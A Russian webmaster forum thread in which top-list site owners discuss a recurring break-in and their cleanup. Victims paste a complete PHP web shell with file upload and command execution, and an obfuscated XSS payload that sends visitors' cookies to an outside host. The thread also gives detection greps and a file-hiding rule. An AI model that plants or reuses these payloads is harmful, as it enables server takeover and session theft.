На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
 Добавлено: 21/01/11 в 18:29 |
Надо кому-то первому попробовать. Наверное это буду я  Попытаюсь по крайней мере
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 25/01/11 в 21:53 |
Держите вторую волну  Билять хоть как фиксили баг так и через мыло форму херачит. Нашел недавно установленный скрипт сука и его хлопнул хоть и версия 5.6. Не должно в форме для ничего кроме {name}[@]{domain}[.]{com} быть! Нет же! И все символы прошли и все. Смотрите удаляйте. Кстати у кого закинули бэкдор считайте что рут пароль просрали. И пока не удалите все файлы с шелами, то менять смысла нет.
ЗЫ последняя капля моего терпения.. 
ЗЫЫ Есть айпи этого пидорга может таго 
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
| Добавлено: 26/01/11 в 11:17 |
мне этот насос тоже запихнул код в auxout+noref, статистика на морде поменялась на нули, сейчас по новой восстанавливаюсь ;(
|
|
|
|
| |
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
| Добавлено: 26/01/11 в 17:41 |
Нашел у себя тоже в auxout+noref скрипт почти на всех топах и опять лишние php файлы в datafiles.
На одном из топов нашел в datafiles вот такой файл .ftpaccess:
| Код: [развернуть] |
HideFiles ^\.(ftpaccess|php)$ user mysite0
PathDenyFilter ^\.(ftpaccess|php)$
|
И удаляйте auxout.dat в backupfiles, там тоже эта шняга сидит.
Что-то мне кажется, что пароли фтп факинг хакер попиздил... 
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 26/01/11 в 23:28 |
J_Geer: Братко самое интересное он и твой рутовский пароль знает. Ломается один скрипт. Дальше через дыру вытягивает пароль рута и привет! Меняйте пароли после того как все проверите
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
| Добавлено: 27/01/11 в 00:35 |
Ну конкретно в моем случае рутовский пароль я и асм не знаю - у меня все топы на виртуалах. Если дальше пойдет - придется саппорт напрягать...
На другом виртуале заменило еще и index.php, стоящие под 444... 29Kb вместо 10,8...
|
|
|
|
| |
С нами с 21.10.05
Сообщения: 3005
Рейтинг: 2712
|
| Добавлено: 27/01/11 в 14:26 |
Намедни чтото странное пыталось засабмиться. Мыло вот такое
Это оно?
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 27/01/11 в 20:40 |
J_Geer:Меняй права и удаляй index.pph обнов скрипт. Отписывай хостеру пусть ищет у тебя файл .php
bubon: Вполне возможно, что нащупывает пробъет или нет. Смотри аминку не покоробило изменением?
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
С нами с 21.10.05
Сообщения: 3005
Рейтинг: 2712
|
| Добавлено: 27/01/11 в 20:56 |
Та вроде все нормально. Темплейты тоже не менялись.
|
|
|
|
| |
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
| Добавлено: 27/01/11 в 21:05 |
Индексы все поменял сразу же из локального бэкапа, вроде все лишние файлы *.php нашел... Поменял все пароли и поставил на templates chmod 555. Посмотрим, что будет...
|
|
|
|
| |
I love suicidegirls.com ;-)
С нами с 27.10.04
Сообщения: 7060
Рейтинг: 2819
|
| Добавлено: 27/01/11 в 21:16 |
Есть идея не большая. А что если сабмит форму топа перенести в другое место какое нибудь. А сабмит проводить через свою форму которая будет чекать все поля на валидность и уже потом отсылать данные на форму которую куда нибудь в другое место зарыли или сразу в базу данных.
Или в чем именно проблема там ? Из за чего просачивается его гавно ?
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 27/01/11 в 21:31 |
| J_Geer писал: | | Индексы все поменял сразу же из локального бэкапа, вроде все лишние файлы *.php нашел... Поменял все пароли и поставил на templates chmod 555. Посмотрим, что будет... |
возможно что морда обновлятся не будет
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
| Добавлено: 27/01/11 в 22:05 |
Морда пишется в файлы main{category}.html в рут директории скрипта, насколько я понимаю. А из темплейтов только берется образец для заполнения. А вот редактироваться из админки темлейты точно не будут, надо будет 777 ставить на папку.
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 27/01/11 в 22:17 |
J_Geer: Я на своих права менял у меня морда не обновлялась
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
| Добавлено: 27/01/11 в 23:16 |
Проверил - обновляется. 555 именно на фолдер templates стоит, а на сам фолдер, в котором скрипт стоит, должны быть права на запись, т.е. 777 или как минимум 755.
|
|
|
|
| |
ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
| Добавлено: 28/01/11 в 08:45 |
+1 _4eburek  Хорошая идея! Хотя у некоторых овнеров есть скрипт, который автоматом самбитит во все его Топ листы, может он и есть, кто бы согласился выложить подобный скрипт в паблик?! ;)
|
|
|
|
| |
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
| Добавлено: 28/01/11 в 11:29 |
_4eburek: У скрипта жёсткая привязка к названию webmasters.php Т.к. у автора там ссылки.
Остальным - пользуйтесь clamav'ом, на freebsd, centos он должен стоять по умолчанию. Там нужны только три команды, даже я разобрался
whereis clamav - если есть, то:
freshclam - обновить базу
clamscan -r -i /usr/home/user/www/ – рекурсивное сканирование, т.е. сканирование в подкаталогах; показывать только инфицированные файлы
Остальным http://www.clamav.net/lang/en/download/ с инструкциями.
CrazyMen: свою проблему вбей в поисковик, там правится конфигурационный файл
|
|
|
|
| |
I love suicidegirls.com ;-)
С нами с 27.10.04
Сообщения: 7060
Рейтинг: 2819
|
| Добавлено: 28/01/11 в 12:09 |
gimcnuk: Ну можно финт ушами сделать. Написать простенький скриптик свой вебмастерс (старый переименовать), через который принимать сабмиты, при апруве просто заменять скрипт на нормальный и своим скриптом туда данные редиректить. потом опять переименовывать топовый вебмастерс.пшп чтобы через него не сабмитили.
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 29/01/11 в 11:45 |
gimcnuk: Проверял по твоей методике не нашел ни одного вируса. Потом через ssh прсомтрел и нашел вредоносные скрипты. Так что не поможет такок действие ничем кроме как профилактики
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
| Добавлено: 29/01/11 в 15:29 |
В принципе, вполне ожидаемый результат. Имхо больше смысла, если есть рут доступ (свой сервер или вдс-ка) прогнать поиском по содержимому файлов, взяв за строку поиска часть содержимого хакерских файлов. Что-то типа
grep -l ${"\x47\x4cO
grep -l x65\x76\x61
из рут директории сервера. Примерно так.
|
|
|
|
| |
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
| Добавлено: 01/02/11 в 02:47 |
Факин шит! На одном из виртуалов, где все уже вроде вычистил, опять объявился левый код. На этот раз на паре топов появился "пустой" мембер (мыло не приходило, хотя везде выставлено извещать), а memberfiles в файле member_name.dat сидел вот такой код:
| Код: [развернуть] |
<html>
<head>
<title>uploader</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style type="text/css">
<!--
body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px}
a { color: #000000; text-decoration: none}
a:hover { color: #000066; text-decoration: underline}
-->
</style>
</head>
<body bgcolor="#999999" text="#000000">
<center>
<table width="700" border="0" bgcolor="#000066">
<tr>
<td>
<table width="100%" border="0" bgcolor="#CCCCCC">
<tr>
<td>
<p><font size="2"><b><font color="#FF0000"> System:
<font color="#000000">
<? passthru("uname -a"); ?>
</font><br>
Our permissions: <font color="#000000">
<? passthru("id"); ?>
</font><br>
Our locality: <font color="#000000">
<? passthru("pwd"); ?>
</font></font></b></font></p>
<pre>
<?php
// FILE UPLOAD
$uploaded = $_FILES['userfile']['tmp_name'];
if (file_exists($uploaded)) {
$pwd_dir = $_POST['dira'];
$real = $_FILES['userfile']['name'];
$destination = $pwd_dir."/".$real;
copy($uploaded, $destination);
echo "Uploaded process:";
print_r ($_FILES);
echo "FILE UPLOADED TO $destination";
} else {
echo " No file uploaded";
}
?> </pre> <form name="form1" method="post" enctype="multipart/form-data">
<table width="100%" border="0">
<tr>
<td width="35%"><font size="2"><b> Browse file
to upload:</b></font></td>
<td width="65%">
<input type="file" name="userfile" size="45">
</td>
</tr>
<tr>
<td width="35%"><b><font size="2"> Destination:</font></b></td>
<td width="65%">
<input type="text" name="dira" size="45" value="<? passthru("pwd"); ?>">
<input type="submit" name="submit2" value="upload">
</td>
</tr>
<tr>
<td width="35%">
<div align="right"> </div>
</td>
<td width="65%"> </td>
</tr>
<tr>
<td width="35%"><b><font size="2"> Command to execute:</font></b></td>
<td width="65%">
<input type="text" name="cmd" size="45" value="<? echo $_POST['cmd']; ?>">
<input type="submit" name="submit" value="execute">
</td>
</tr>
<tr>
<td width="35%">
<div align="right"> </div>
</td>
<td width="65%"> </td>
</tr>
</table>
</form>
<p>
<pre>
<?
// command output
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
echo "$cmd executed...<br>";
passthru("$cmd");
}
else {
echo "No shell command executed";
}
?></pre>
<div align="right"> <font size="1"><b>2003 © </b></font> </div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
</body>
</html>
|
и опять поменяло код в auxout+noref на
| Код: [развернуть] | | "><script>eval(String.fromCharCode(105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,115,46,120,116,100,115,46,105,110,47,115,46,112,104,112,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59))</script><a href=http://your_noref_url \ |
В остальном топы работали нормально, темплейты под 555 и индексы целые. На другом виртуале пока все в порядке.
Опять вычистил все и поменял права на auxout.dat на 444. Хрен с ней, со статистикой, задрало уже чистить это г...но через день.
Видимо, эта хрень все-таки через сабмит-форму лезет. Видимо надо менять сабмит на чисто мыльный...
|
|
|
|
| |
С нами с 20.07.05
Сообщения: 315
Рейтинг: 407
|
| Добавлено: 01/02/11 в 08:53 |
Переделал для сабмита форму обратной связи. Родной webmasters.php просто подменяется этим файлом.
Эта форма не имеет никакого доступа к скрипту, а просто шлет на заданное мыло данные трейдера. Которые потом вбиваются ручками через админку. Е-мейл, макс. длина полей и заполненность проверяются, единственное, чего не осилил со своим "РНР со словарем" - проверку урла на валидность. Заплутал в регулярках. Кто шарит, подправьте плиз в строке 137.
В общем, если кому интересно, смотрим и берем здесь
|
|
|
|
| |
ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
| Добавлено: 01/02/11 в 08:56 |
J_Geer - Интересный подход!  Спасибо за скрипт! ;)
|
|
|
|
| |
С нами с 05.10.05
Сообщения: 841
Рейтинг: 486
|
| Добавлено: 01/02/11 в 19:20 |
Меня на 4 страницу данной топика антивирь не пускает - блокирует, чего вы там понаписали?
|
|
|
|
| |
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
| Добавлено: 01/02/11 в 20:48 |
AndreXXX: Ты не должен был сюда заходить! Мы еще тебе сюрприз недописали в коде  . Часть кода видно не потерли вот орет на него
|
|
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
| |
